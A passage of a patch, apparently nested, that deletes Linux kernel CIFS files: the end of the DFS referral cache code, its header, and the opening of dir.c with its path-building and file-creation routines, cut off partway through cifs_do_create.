+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_noreq_update_tgthint - update target hint of a DFS cache entry
+- * without sending any requests to the currently connected server.
+- *
+- * NOTE: This function will neither update a cache entry in case it was
+- * expired, nor create a new cache entry if @path hasn't been found. It heavily
+- * relies on an existing cache entry.
+- *
+- * @path: canonical DFS path to lookup in DFS referral cache.
+- * @it: target iterator which contains the target hint to update the cache
+- * entry with.
+- *
+- * Return zero if the target hint was updated successfully, otherwise non-zero.
+- */
+-int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-	struct cache_dfs_tgt *t;
+-
+-	if (!it)
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_write(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	rc = 0;
+-	t = ce->tgthint;
+-
+-	if (unlikely(!strcasecmp(it->it_name, t->name)))
+-		goto out_unlock;
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		if (!strcasecmp(t->name, it->it_name)) {
+-			ce->tgthint = t;
+-			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
+-				 it->it_name);
+-			break;
+-		}
+-	}
+-
+-out_unlock:
+-	up_write(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_get_tgt_referral - returns a DFS referral (@ref) from a given
+- * target iterator (@it).
+- *
+- * @path: canonical DFS path to lookup in DFS referral cache.
+- * @it: DFS target iterator.
+- * @ref: DFS referral pointer to set up the gathered information.
+- *
+- * Return zero if the DFS referral was set up correctly, otherwise non-zero.
+- */
+-int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
+-			       struct dfs_info3_param *ref)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-
+-	if (!it || !ref)
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	cifs_dbg(FYI, "%s: target name: %s\n", __func__, it->it_name);
+-
+-	rc = setup_referral(path, ce, ref, it->it_name);
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_add_refsrv_session - add SMB session of referral server
+- *
+- * @mount_id: mount group uuid to lookup.
+- * @ses: reference counted SMB session of referral server.
+- */
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
+-{
+-	struct mount_group *mg;
+-
+-	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
+-		return;
+-
+-	mg = get_mount_group(mount_id);
+-	if (WARN_ON_ONCE(IS_ERR(mg)))
+-		return;
+-
+-	spin_lock(&mg->lock);
+-	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
+-		mg->sessions[mg->num_sessions++] = ses;
+-	spin_unlock(&mg->lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/**
+- * dfs_cache_put_refsrv_sessions - put all referral server sessions
+- *
+- * Put all SMB sessions from the given mount group id.
+- *
+- * @mount_id: mount group uuid to lookup.
+- */
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
+-{
+-	struct mount_group *mg;
+-
+-	if (!mount_id || uuid_is_null(mount_id))
+-		return;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		return;
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/* Extract share from DFS target and return a pointer to prefix path or NULL */
+-static const char *parse_target_share(const char *target, char **share)
+-{
+-	const char *s, *seps = "/\\";
+-	size_t len;
+-
+-	s = strpbrk(target + 1, seps);
+-	if (!s)
+-		return ERR_PTR(-EINVAL);
+-
+-	len = strcspn(s + 1, seps);
+-	if (!len)
+-		return ERR_PTR(-EINVAL);
+-	s += len;
+-
+-	len = s - target + 1;
+-	*share = kstrndup(target, len, GFP_KERNEL);
+-	if (!*share)
+-		return ERR_PTR(-ENOMEM);
+-
+-	s = target + len;
+-	return s + strspn(s, seps);
+-}
+-
+-/**
+- * dfs_cache_get_tgt_share - parse a DFS target
+- *
+- * @path: DFS full path
+- * @it: DFS target iterator.
+- * @share: tree name.
+- * @prefix: prefix path.
+- *
+- * Return zero if target was parsed correctly, otherwise non-zero.
+- */
+-int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+-			    char **prefix)
+-{
+-	char sep;
+-	char *target_share;
+-	char *ppath = NULL;
+-	const char *target_ppath, *dfsref_ppath;
+-	size_t target_pplen, dfsref_pplen;
+-	size_t len, c;
+-
+-	if (!it || !path || !share || !prefix || strlen(path) < it->it_path_consumed)
+-		return -EINVAL;
+-
+-	sep = it->it_name[0];
+-	if (sep != '\\' && sep != '/')
+-		return -EINVAL;
+-
+-	target_ppath = parse_target_share(it->it_name, &target_share);
+-	if (IS_ERR(target_ppath))
+-		return PTR_ERR(target_ppath);
+-
+-	/* point to prefix in DFS referral path */
+-	dfsref_ppath = path + it->it_path_consumed;
+-	dfsref_ppath += strspn(dfsref_ppath, "/\\");
+-
+-	target_pplen = strlen(target_ppath);
+-	dfsref_pplen = strlen(dfsref_ppath);
+-
+-	/* merge prefix paths from DFS referral path and target node */
+-	if (target_pplen || dfsref_pplen) {
+-		len = target_pplen + dfsref_pplen + 2;
+-		ppath = kzalloc(len, GFP_KERNEL);
+-		if (!ppath) {
+-			kfree(target_share);
+-			return -ENOMEM;
+-		}
+-		c = strscpy(ppath, target_ppath, len);
+-		if (c && dfsref_pplen)
+-			ppath[c] = sep;
+-		strlcat(ppath, dfsref_ppath, len);
+-	}
+-	*share = target_share;
+-	*prefix = ppath;
+-	return 0;
+-}
+-
+-static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, const char *s2)
+-{
+-	char unc[sizeof("\\\\") + SERVER_NAME_LENGTH] = {0};
+-	const char *host;
+-	size_t hostlen;
+-	char *ip = NULL;
+-	struct sockaddr sa;
+-	bool match;
+-	int rc;
+-
+-	if (strcasecmp(s1, s2))
+-		return false;
+-
+-	/*
+-	 * Resolve share's hostname and check if server address matches.  Otherwise just ignore it
+-	 * as we could not have upcall to resolve hostname or failed to convert ip address.
+-	 */
+-	match = true;
+-	extract_unc_hostname(s1, &host, &hostlen);
+-	scnprintf(unc, sizeof(unc), "\\\\%.*s", (int)hostlen, host);
+-
+-	rc = dns_resolve_server_name_to_ip(unc, &ip, NULL);
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: could not resolve %.*s. assuming server address matches.\n",
+-			 __func__, (int)hostlen, host);
+-		return true;
+-	}
+-
+-	if (!cifs_convert_address(&sa, ip, strlen(ip))) {
+-		cifs_dbg(VFS, "%s: failed to convert address \'%s\'. skip address matching.\n",
+-			 __func__, ip);
+-	} else {
+-		cifs_server_lock(server);
+-		match = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr, &sa);
+-		cifs_server_unlock(server);
+-	}
+-
+-	kfree(ip);
+-	return match;
+-}
+-
+-/*
+- * Mark dfs tcon for reconnecting when the currently connected tcon does not match any of the new
+- * target shares in @refs.
+- */
+-static void mark_for_reconnect_if_needed(struct cifs_tcon *tcon, struct dfs_cache_tgt_list *tl,
+-					 const struct dfs_info3_param *refs, int numrefs)
+-{
+-	struct dfs_cache_tgt_iterator *it;
+-	int i;
+-
+-	for (it = dfs_cache_get_tgt_iterator(tl); it; it = dfs_cache_get_next_tgt(tl, it)) {
+-		for (i = 0; i < numrefs; i++) {
+-			if (target_share_equal(tcon->ses->server, dfs_cache_get_tgt_name(it),
+-					       refs[i].node_name))
+-				return;
+-		}
+-	}
+-
+-	cifs_dbg(FYI, "%s: no cached or matched targets. mark dfs share for reconnect.\n", __func__);
+-	cifs_signal_cifsd_for_reconnect(tcon->ses->server, true);
+-}
+-
+-/* Refresh dfs referral of tcon and mark it for reconnect if needed */
+-static int __refresh_tcon(const char *path, struct cifs_ses **sessions, struct cifs_tcon *tcon,
+-			  bool force_refresh)
+-{
+-	struct cifs_ses *ses;
+-	struct cache_entry *ce;
+-	struct dfs_info3_param *refs = NULL;
+-	int numrefs = 0;
+-	bool needs_refresh = false;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	int rc = 0;
+-	unsigned int xid;
+-
+-	ses = find_ipc_from_server_path(sessions, path);
+-	if (IS_ERR(ses)) {
+-		cifs_dbg(FYI, "%s: could not find ipc session\n", __func__);
+-		return PTR_ERR(ses);
+-	}
+-
+-	down_read(&htable_rw_lock);
+-	ce = lookup_cache_entry(path);
+-	needs_refresh = force_refresh || IS_ERR(ce) || cache_entry_expired(ce);
+-	if (!IS_ERR(ce)) {
+-		rc = get_targets(ce, &tl);
+-		if (rc)
+-			cifs_dbg(FYI, "%s: could not get dfs targets: %d\n", __func__, rc);
+-	}
+-	up_read(&htable_rw_lock);
+-
+-	if (!needs_refresh) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	xid = get_xid();
+-	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-	free_xid(xid);
+-
+-	/* Create or update a cache entry with the new referral */
+-	if (!rc) {
+-		dump_refs(refs, numrefs);
+-
+-		down_write(&htable_rw_lock);
+-		ce = lookup_cache_entry(path);
+-		if (IS_ERR(ce))
+-			add_cache_entry_locked(refs, numrefs);
+-		else if (force_refresh || cache_entry_expired(ce))
+-			update_cache_entry_locked(ce, refs, numrefs);
+-		up_write(&htable_rw_lock);
+-
+-		mark_for_reconnect_if_needed(tcon, &tl, refs, numrefs);
+-	}
+-
+-out:
+-	dfs_cache_free_tgts(&tl);
+-	free_dfs_info_array(refs, numrefs);
+-	return rc;
+-}
+-
+-static int refresh_tcon(struct cifs_ses **sessions, struct cifs_tcon *tcon, bool force_refresh)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	mutex_lock(&server->refpath_lock);
+-	if (server->origin_fullpath) {
+-		if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
+-							server->origin_fullpath))
+-			__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, force_refresh);
+-		__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, force_refresh);
+-	}
+-	mutex_unlock(&server->refpath_lock);
+-
+-	return 0;
+-}
+-
+-/**
+- * dfs_cache_remount_fs - remount a DFS share
+- *
+- * Reconfigure dfs mount by forcing a new DFS referral and if the currently cached targets do not
+- * match any of the new targets, mark it for reconnect.
+- *
+- * @cifs_sb: cifs superblock.
+- *
+- * Return zero if remounted, otherwise non-zero.
+- */
+-int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct mount_group *mg;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
+-	int rc;
+-
+-	if (!cifs_sb || !cifs_sb->master_tlink)
+-		return -EINVAL;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	server = tcon->ses->server;
+-
+-	if (!server->origin_fullpath) {
+-		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
+-		return 0;
+-	}
+-
+-	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
+-		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(&cifs_sb->dfs_mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		cifs_dbg(FYI, "%s: no ipc session for refreshing referral\n", __func__);
+-		return PTR_ERR(mg);
+-	}
+-	kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	spin_lock(&mg->lock);
+-	memcpy(&sessions, mg->sessions, mg->num_sessions * sizeof(mg->sessions[0]));
+-	spin_unlock(&mg->lock);
+-
+-	/*
+-	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+-	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
+-	 */
+-	cifs_autodisable_serverino(cifs_sb);
+-	/*
+-	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
+-	 * that have different prefix paths.
+-	 */
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	rc = refresh_tcon(sessions, tcon, true);
+-
+-	kref_put(&mg->refcount, mount_group_release);
+-	return rc;
+-}
+-
+-/*
+- * Refresh all active dfs mounts regardless of whether they are in cache or not.
+- * (cache can be cleared)
+- */
+-static void refresh_mounts(struct cifs_ses **sessions)
+-{
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon, *ntcon;
+-	struct list_head tcons;
+-
+-	INIT_LIST_HEAD(&tcons);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-		if (!server->is_dfs_conn) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				spin_lock(&tcon->tc_lock);
+-				if (!tcon->ipc && !tcon->need_reconnect) {
+-					tcon->tc_count++;
+-					list_add_tail(&tcon->ulist, &tcons);
+-				}
+-				spin_unlock(&tcon->tc_lock);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-
+-		list_del_init(&tcon->ulist);
+-
+-		mutex_lock(&server->refpath_lock);
+-		if (server->origin_fullpath) {
+-			if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
+-								server->origin_fullpath))
+-				__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, false);
+-			__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, false);
+-		}
+-		mutex_unlock(&server->refpath_lock);
+-
+-		cifs_put_tcon(tcon);
+-	}
+-}
+-
+-static void refresh_cache(struct cifs_ses **sessions)
+-{
+-	int i;
+-	struct cifs_ses *ses;
+-	unsigned int xid;
+-	char *ref_paths[CACHE_MAX_ENTRIES];
+-	int count = 0;
+-	struct cache_entry *ce;
+-
+-	/*
+-	 * Refresh all cached entries.  Get all new referrals outside critical section to avoid
+-	 * starvation while performing SMB2 IOCTL on broken or slow connections.
+-
+-	 * The cache entries may cover more paths than the active mounts
+-	 * (e.g. domain-based DFS referrals or multi tier DFS setups).
+-	 */
+-	down_read(&htable_rw_lock);
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (count == ARRAY_SIZE(ref_paths))
+-				goto out_unlock;
+-			if (hlist_unhashed(&ce->hlist) || !cache_entry_expired(ce) ||
+-			    IS_ERR(find_ipc_from_server_path(sessions, ce->path)))
+-				continue;
+-			ref_paths[count++] = kstrdup(ce->path, GFP_ATOMIC);
+-		}
+-	}
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-
+-	for (i = 0; i < count; i++) {
+-		char *path = ref_paths[i];
+-		struct dfs_info3_param *refs = NULL;
+-		int numrefs = 0;
+-		int rc = 0;
+-
+-		if (!path)
+-			continue;
+-
+-		ses = find_ipc_from_server_path(sessions, path);
+-		if (IS_ERR(ses))
+-			goto next_referral;
+-
+-		xid = get_xid();
+-		rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-		free_xid(xid);
+-
+-		if (!rc) {
+-			down_write(&htable_rw_lock);
+-			ce = lookup_cache_entry(path);
+-			/*
+-			 * We need to re-check it because other tasks might have it deleted or
+-			 * updated.
+-			 */
+-			if (!IS_ERR(ce) && cache_entry_expired(ce))
+-				update_cache_entry_locked(ce, refs, numrefs);
+-			up_write(&htable_rw_lock);
+-		}
+-
+-next_referral:
+-		kfree(path);
+-		free_dfs_info_array(refs, numrefs);
+-	}
+-}
+-
+-/*
+- * Worker that will refresh DFS cache and active mounts based on lowest TTL value from a DFS
+- * referral.
+- */
+-static void refresh_cache_worker(struct work_struct *work)
+-{
+-	struct list_head mglist;
+-	struct mount_group *mg, *tmp_mg;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
+-	int max_sessions = ARRAY_SIZE(sessions) - 1;
+-	int i = 0, count;
+-
+-	INIT_LIST_HEAD(&mglist);
+-
+-	/* Get refereces of mount groups */
+-	mutex_lock(&mount_group_list_lock);
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		kref_get(&mg->refcount);
+-		list_add(&mg->refresh_list, &mglist);
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	/* Fill in local array with an NULL-terminated list of all referral server sessions */
+-	list_for_each_entry(mg, &mglist, refresh_list) {
+-		if (i >= max_sessions)
+-			break;
+-
+-		spin_lock(&mg->lock);
+-		if (i + mg->num_sessions > max_sessions)
+-			count = max_sessions - i;
+-		else
+-			count = mg->num_sessions;
+-		memcpy(&sessions[i], mg->sessions, count * sizeof(mg->sessions[0]));
+-		spin_unlock(&mg->lock);
+-		i += count;
+-	}
+-
+-	if (sessions[0]) {
+-		/* Refresh all active mounts and cached entries */
+-		refresh_mounts(sessions);
+-		refresh_cache(sessions);
+-	}
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mglist, refresh_list) {
+-		list_del_init(&mg->refresh_list);
+-		kref_put(&mg->refcount, mount_group_release);
+-	}
+-
+-	spin_lock(&cache_ttl_lock);
+-	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	spin_unlock(&cache_ttl_lock);
+-}
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+deleted file mode 100644
+index 52070d1df1897..0000000000000
+--- a/fs/cifs/dfs_cache.h
++++ /dev/null
+@@ -1,97 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * DFS referral cache routines
+- *
+- * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-
+-#ifndef _CIFS_DFS_CACHE_H
+-#define _CIFS_DFS_CACHE_H
+-
+-#include <linux/nls.h>
+-#include <linux/list.h>
+-#include <linux/uuid.h>
+-#include "cifsglob.h"
+-
+-#define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
+-
+-struct dfs_cache_tgt_list {
+-	int tl_numtgts;
+-	struct list_head tl_list;
+-};
+-
+-struct dfs_cache_tgt_iterator {
+-	char *it_name;
+-	int it_path_consumed;
+-	struct list_head it_list;
+-};
+-
+-int dfs_cache_init(void);
+-void dfs_cache_destroy(void);
+-extern const struct proc_ops dfscache_proc_ops;
+-
+-int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
+-		   int remap, const char *path, struct dfs_info3_param *ref,
+-		   struct dfs_cache_tgt_list *tgt_list);
+-int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
+-			 struct dfs_cache_tgt_list *tgt_list);
+-int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+-			     const struct nls_table *cp, int remap, const char *path,
+-			     const struct dfs_cache_tgt_iterator *it);
+-int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it);
+-int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
+-			       struct dfs_info3_param *ref);
+-int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+-			    char **prefix);
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
+-char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+-int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
+-
+-static inline struct dfs_cache_tgt_iterator *
+-dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
+-		       struct dfs_cache_tgt_iterator *it)
+-{
+-	if (!tl || list_empty(&tl->tl_list) || !it ||
+-	    list_is_last(&it->it_list, &tl->tl_list))
+-		return NULL;
+-	return list_next_entry(it, it_list);
+-}
+-
+-static inline struct dfs_cache_tgt_iterator *
+-dfs_cache_get_tgt_iterator(struct dfs_cache_tgt_list *tl)
+-{
+-	if (!tl)
+-		return NULL;
+-	return list_first_entry_or_null(&tl->tl_list,
+-					struct dfs_cache_tgt_iterator,
+-					it_list);
+-}
+-
+-static inline void dfs_cache_free_tgts(struct dfs_cache_tgt_list *tl)
+-{
+-	struct dfs_cache_tgt_iterator *it, *nit;
+-
+-	if (!tl || list_empty(&tl->tl_list))
+-		return;
+-	list_for_each_entry_safe(it, nit, &tl->tl_list, it_list) {
+-		list_del(&it->it_list);
+-		kfree(it->it_name);
+-		kfree(it);
+-	}
+-	tl->tl_numtgts = 0;
+-}
+-
+-static inline const char *
+-dfs_cache_get_tgt_name(const struct dfs_cache_tgt_iterator *it)
+-{
+-	return it ? it->it_name : NULL;
+-}
+-
+-static inline int
+-dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
+-{
+-	return tl ? tl->tl_numtgts : 0;
+-}
+-
+-#endif /* _CIFS_DFS_CACHE_H */
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+deleted file mode 100644
+index e382b794acbed..0000000000000
+--- a/fs/cifs/dir.c
++++ /dev/null
+@@ -1,867 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with dentries
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/namei.h>
+-#include <linux/mount.h>
+-#include <linux/file.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "fscache.h"
+-
+-static void
+-renew_parental_timestamps(struct dentry *direntry)
+-{
+-	/* BB check if there is a way to get the kernel to do this or if we
+-	   really need this */
+-	do {
+-		cifs_set_time(direntry, jiffies);
+-		direntry = direntry->d_parent;
+-	} while (!IS_ROOT(direntry));
+-}
+-
+-char *
+-cifs_build_path_to_root(struct smb3_fs_context *ctx, struct cifs_sb_info *cifs_sb,
+-			struct cifs_tcon *tcon, int add_treename)
+-{
+-	int pplen = ctx->prepath ? strlen(ctx->prepath) + 1 : 0;
+-	int dfsplen;
+-	char *full_path = NULL;
+-
+-	/* if no prefix path, simply set path to the root of share to "" */
+-	if (pplen == 0) {
+-		full_path = kzalloc(1, GFP_KERNEL);
+-		return full_path;
+-	}
+-
+-	if (add_treename)
+-		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
+-	else
+-		dfsplen = 0;
+-
+-	full_path = kmalloc(dfsplen + pplen + 1, GFP_KERNEL);
+-	if (full_path == NULL)
+-		return full_path;
+-
+-	if (dfsplen)
+-		memcpy(full_path, tcon->tree_name, dfsplen);
+-	full_path[dfsplen] = CIFS_DIR_SEP(cifs_sb);
+-	memcpy(full_path + dfsplen + 1, ctx->prepath, pplen);
+-	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
+-	return full_path;
+-}
+-
+-/* Note: caller must free return buffer */
+-const char *
+-build_path_from_dentry(struct dentry *direntry, void *page)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	bool prefix = tcon->Flags & SMB_SHARE_IS_IN_DFS;
+-
+-	return build_path_from_dentry_optional_prefix(direntry, page,
+-						      prefix);
+-}
+-
+-char *
+-build_path_from_dentry_optional_prefix(struct dentry *direntry, void *page,
+-				       bool prefix)
+-{
+-	int dfsplen;
+-	int pplen = 0;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	char dirsep = CIFS_DIR_SEP(cifs_sb);
+-	char *s;
+-
+-	if (unlikely(!page))
+-		return ERR_PTR(-ENOMEM);
+-
+-	if (prefix)
+-		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
+-	else
+-		dfsplen = 0;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-		pplen = cifs_sb->prepath ? strlen(cifs_sb->prepath) + 1 : 0;
+-
+-	s = dentry_path_raw(direntry, page, PATH_MAX);
+-	if (IS_ERR(s))
+-		return s;
+-	if (!s[1])	// for root we want "", not "/"
+-		s++;
+-	if (s < (char *)page + pplen + dfsplen)
+-		return ERR_PTR(-ENAMETOOLONG);
+-	if (pplen) {
+-		cifs_dbg(FYI, "using cifs_sb prepath <%s>\n", cifs_sb->prepath);
+-		s -= pplen;
+-		memcpy(s + 1, cifs_sb->prepath, pplen - 1);
+-		*s = '/';
+-	}
+-	if (dirsep != '/') {
+-		/* BB test paths to Windows with '/' in the midst of prepath */
+-		char *p;
+-
+-		for (p = s; *p; p++)
+-			if (*p == '/')
+-				*p = dirsep;
+-	}
+-	if (dfsplen) {
+-		s -= dfsplen;
+-		memcpy(s, tcon->tree_name, dfsplen);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS) {
+-			int i;
+-			for (i = 0; i < dfsplen; i++) {
+-				if (s[i] == '\\')
+-					s[i] = '/';
+-			}
+-		}
+-	}
+-	return s;
+-}
+-
+-/*
+- * Don't allow path components longer than the server max.
+- * Don't allow the separator character in a path component.
+- * The VFS will not allow "/", but "\" is allowed by posix.
+- */
+-static int
+-check_name(struct dentry *direntry, struct cifs_tcon *tcon)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	int i;
+-
+-	if (unlikely(tcon->fsAttrInfo.MaxPathNameComponentLength &&
+-		     direntry->d_name.len >
+-		     le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength)))
+-		return -ENAMETOOLONG;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)) {
+-		for (i = 0; i < direntry->d_name.len; i++) {
+-			if (direntry->d_name.name[i] == '\\') {
+-				cifs_dbg(FYI, "Invalid file name\n");
+-				return -EINVAL;
+-			}
+-		}
+-	}
+-	return 0;
+-}
+-
+-
+-/* Inode operations in similar order to how they appear in Linux file fs.h */
+-
+-static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned int xid,
+-			  struct tcon_link *tlink, unsigned int oflags, umode_t mode, __u32 *oplock,
+-			  struct cifs_fid *fid, struct cifs_open_info_data *buf)
+-{
+-	int rc = -ENOENT;
+-	int create_options = CREATE_NOT_DIR;
+-	int desired_access;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = tlink_tcon(tlink);
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct inode *newinode = NULL;
+-	int disposition;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifs_open_parms oparms;
+-
+-	*oplock = 0;
+-	if (tcon->ses->server->oplocks)
+-		*oplock = REQ_OPLOCK;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		free_dentry_path(page);
+-		return PTR_ERR(full_path);
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
+-	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-			le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = cifs_posix_open(full_path, &newinode, inode->i_sb, mode,
+-				     oflags, oplock, &fid->netfid, xid);
+-		switch (rc) {
+-		case 0:
+-			if (newinode == NULL) {
+-				/* query inode info */
+-				goto cifs_create_get_file_info;
+-			}
+-
+-			if (S_ISDIR(newinode->i_mode)) {
+-				CIFSSMBClose(xid, tcon, fid->netfid);
+-				iput(newinode);
+-				rc = -EISDIR;
+-				goto out;
+-			}
+-
+-			if (!S_ISREG(newinode->i_mode)) {
+-				/*
+-				 * The server may allow us to open things like
+-				 * FIFOs, but the client isn't set up to deal
+-				 * with that. If it's not a regular file, just
+-				 * close it and proceed as if it were a normal
+-				 * lookup.
+-				 */
+-				CIFSSMBClose(xid, tcon, fid->netfid);
+-				goto cifs_create_get_file_info;
+-			}
+-			/* success, no need to query */
+-			goto cifs_create_set_dentry;
+-
+-		case -ENOENT:
+-			goto cifs_create_get_file_info;
+-
+-		case -EIO:
+-		case -EINVAL:
+-			/*
+-			 * EIO could indicate that (posix open) operation is not
+-			 * supported, despite what server claimed in capability
+-			 * negotiation.
+-			 *
